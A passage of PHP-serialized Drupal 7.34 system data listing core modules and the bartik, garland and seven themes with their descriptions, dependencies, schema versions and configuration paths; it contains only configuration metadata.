API.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:13:\"field_ui.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"file\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/file/file.module\";s:4:\"name\";s:4:\"file\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:4:\"File\";s:11:\"description\";s:26:\"Defines a file field type.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:15:\"tests/file.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:6:\"filter\";O:8:\"stdClass\":9:{s:8:\"filename\";s:28:\"modules/filter/filter.module\";s:4:\"name\";s:6:\"filter\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7010\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:6:\"Filter\";s:11:\"description\";s:43:\"Filters content in preparation for display.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"filter.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:28:\"admin/config/content/formats\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"help\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/help/help.module\";s:4:\"name\";s:4:\"help\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:4:\"Help\";s:11:\"description\";s:35:\"Manages the display of online help.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"help.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:5:\"image\";O:8:\"stdClass\":9:{s:8:\"filename\";s:26:\"modules/image/image.module\";s:4:\"name\";s:5:\"image\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7005\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:15:{s:4:\"name\";s:5:\"Image\";s:11:\"description\";s:34:\"Provides image manipulation tools.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:4:\"file\";}s:5:\"files\";a:1:{i:0;s:10:\"image.test\";}s:9:\"configure\";s:31:\"admin/config/media/image-styles\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:8:\"required\";b:1;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}}s:4:\"list\";O:8:\"stdClass\":9:{s:8:\"filename\";s:38:\"modules/field/modules/list/list.module\";s:4:\"name\";s:4:\"list\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7002\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:4:\"List\";s:11:\"description\";s:69:\"Defines list field types. Use with Options to create selection lists.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:2:{i:0;s:5:\"field\";i:1;s:7:\"options\";}s:5:\"files\";a:1:{i:0;s:15:\"tests/list.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"menu\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/menu/menu.module\";s:4:\"name\";s:4:\"menu\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7003\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:4:\"Menu\";s:11:\"description\";s:60:\"Allows administrators to customize the site navigation menu.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"menu.test\";}s:9:\"configure\";s:20:\"admin/structure/menu\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"node\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/node/node.module\";s:4:\"name\";s:4:\"node\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7014\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:15:{s:4:\"name\";s:4:\"Node\";s:11:\"description\";s:66:\"Allows content to be submitted to the site and displayed on pages.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:11:\"node.module\";i:1;s:9:\"node.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:21:\"admin/structure/types\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"node.css\";s:21:\"modules/node/node.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:6:\"number\";O:8:\"stdClass\":9:{s:8:\"filename\";s:42:\"modules/field/modules/number/number.module\";s:4:\"name\";s:6:\"number\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:6:\"Number\";s:11:\"description\";s:28:\"Defines numeric field types.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:11:\"number.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:7:\"options\";O:8:\"stdClass\":9:{s:8:\"filename\";s:44:\"modules/field/modules/options/options.module\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:7:\"Options\";s:11:\"description\";s:82:\"Defines selection, check box and radio button widgets for text and numeric fields.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:12:\"options.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:7:\"overlay\";O:8:\"stdClass\":9:{s:8:\"filename\";s:30:\"modules/overlay/overlay.module\";s:4:\"name\";s:7:\"overlay\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"1\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:7:\"Overlay\";s:11:\"description\";s:59:\"Displays the Drupal administration interface in an overlay.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}}s:4:\"path\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/path/path.module\";s:4:\"name\";s:4:\"path\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:4:\"Path\";s:11:\"description\";s:28:\"Allows users to rename URLs.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"path.test\";}s:9:\"configure\";s:24:\"admin/config/search/path\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:3:\"rdf\";O:8:\"stdClass\":9:{s:8:\"filename\";s:22:\"modules/rdf/rdf.module\";s:4:\"name\";s:3:\"rdf\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:3:\"RDF\";s:11:\"description\";s:148:\"Enriches your content with metadata to let other applications (e.g. search engines, aggregators) better understand its relationships and attributes.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:8:\"rdf.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:6:\"search\";O:8:\"stdClass\":9:{s:8:\"filename\";s:28:\"modules/search/search.module\";s:4:\"name\";s:6:\"search\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7000\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:6:\"Search\";s:11:\"description\";s:36:\"Enables site-wide keyword searching.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:19:\"search.extender.inc\";i:1;s:11:\"search.test\";}s:9:\"configure\";s:28:\"admin/config/search/settings\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"search.css\";s:25:\"modules/search/search.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:8:\"shortcut\";O:8:\"stdClass\":9:{s:8:\"filename\";s:32:\"modules/shortcut/shortcut.module\";s:4:\"name\";s:8:\"shortcut\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:8:\"Shortcut\";s:11:\"description\";s:60:\"Allows users to manage customizable lists of shortcut links.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:13:\"shortcut.test\";}s:9:\"configure\";s:36:\"admin/config/user-interface/shortcut\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:10:\"statistics\";O:8:\"stdClass\":9:{s:8:\"filename\";s:36:\"modules/statistics/statistics.module\";s:4:\"name\";s:10:\"statistics\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"1\";s:14:\"schema_version\";s:4:\"7000\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:10:\"Statistics\";s:11:\"description\";s:37:\"Logs access statistics for your site.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:15:\"statistics.test\";}s:9:\"configure\";s:30:\"admin/config/system/statistics\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:6:\"system\";O:8:\"stdClass\":9:{s:8:\"filename\";s:28:\"modules/system/system.module\";s:4:\"name\";s:6:\"system\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7079\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:6:\"System\";s:11:\"description\";s:54:\"Handles general site configuration for administrators.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:6:{i:0;s:19:\"system.archiver.inc\";i:1;s:15:\"system.mail.inc\";i:2;s:16:\"system.queue.inc\";i:3;s:14:\"system.tar.inc\";i:4;s:18:\"system.updater.inc\";i:5;s:11:\"system.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:19:\"admin/config/system\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:8:\"taxonomy\";O:8:\"stdClass\":9:{s:8:\"filename\";s:32:\"modules/taxonomy/taxonomy.module\";s:4:\"name\";s:8:\"taxonomy\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7011\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:15:{s:4:\"name\";s:8:\"Taxonomy\";s:11:\"description\";s:38:\"Enables the categorization of content.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:7:\"options\";}s:5:\"files\";a:2:{i:0;s:15:\"taxonomy.module\";i:1;s:13:\"taxonomy.test\";}s:9:\"configure\";s:24:\"admin/structure/taxonomy\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:8:\"required\";b:1;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}}s:4:\"text\";O:8:\"stdClass\":9:{s:8:\"filename\";s:38:\"modules/field/modules/text/text.module\";s:4:\"name\";s:4:\"text\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7000\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:4:\"Text\";s:11:\"description\";s:32:\"Defines simple text field types.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:9:\"text.test\";}s:8:\"required\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}}s:7:\"toolbar\";O:8:\"stdClass\":9:{s:8:\"filename\";s:30:\"modules/toolbar/toolbar.module\";s:4:\"name\";s:7:\"toolbar\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:7:\"Toolbar\";s:11:\"description\";s:99:\"Provides a toolbar that shows the top-level administration menu items and links from other modules.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}}s:6:\"update\";O:8:\"stdClass\":9:{s:8:\"filename\";s:28:\"modules/update/update.module\";s:4:\"name\";s:6:\"update\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7001\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:14:\"Update manager\";s:11:\"description\";s:104:\"Checks for available updates, and can securely install or update modules and themes via a web interface.\";s:7:\"version\";s:4:\"7.34\";s:7:\"package\";s:4:\"Core\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"update.test\";}s:9:\"configure\";s:30:\"admin/reports/updates/settings\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"user\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/user/user.module\";s:4:\"name\";s:4:\"user\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7018\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:15:{s:4:\"name\";s:4:\"User\";s:11:\"description\";s:47:\"Manages the user registration and login system.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:11:\"user.module\";i:1;s:9:\"user.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:19:\"admin/config/people\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"user.css\";s:21:\"modules/user/user.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:8:\"standard\";O:8:\"stdClass\":9:{s:8:\"filename\";s:34:\"profiles/standard/standard.profile\";s:4:\"name\";s:8:\"standard\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:4:\"1000\";s:4:\"info\";a:15:{s:4:\"name\";s:8:\"Standard\";s:11:\"description\";s:51:\"Install with commonly used features pre-configured.\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:21:{i:0;s:5:\"block\";i:1;s:5:\"color\";i:2;s:7:\"comment\";i:3;s:10:\"contextual\";i:4;s:9:\"dashboard\";i:5;s:4:\"help\";i:6;s:5:\"image\";i:7;s:4:\"list\";i:8;s:4:\"menu\";i:9;s:6:\"number\";i:10;s:7:\"options\";i:11;s:4:\"path\";i:12;s:8:\"taxonomy\";i:13;s:5:\"dblog\";i:14;s:6:\"search\";i:15;s:8:\"shortcut\";i:16;s:7:\"toolbar\";i:17;s:7:\"overlay\";i:18;s:8:\"field_ui\";i:19;s:4:\"file\";i:20;s:3:\"rdf\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:5:\"mtime\";i:1416429488;s:7:\"package\";s:5:\"Other\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;s:6:\"hidden\";b:1;s:8:\"required\";b:1;s:17:\"distribution_name\";s:6:\"Drupal\";}}}s:5:\"theme\";a:4:{s:6:\"bartik\";O:8:\"stdClass\":10:{s:8:\"filename\";s:25:\"themes/bartik/bartik.info\";s:4:\"name\";s:6:\"bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";}s:7:\"garland\";O:8:\"stdClass\":10:{s:8:\"filename\";s:27:\"themes/garland/garland.info\";s:4:\"name\";s:7:\"garland\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";}s:5:\"seven\";O:8:\"stdClass\":10:{s:8:\"filename\";s:23:\"themes/seven/seven.info\";s:4:\"name\";s:5:\"seven\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\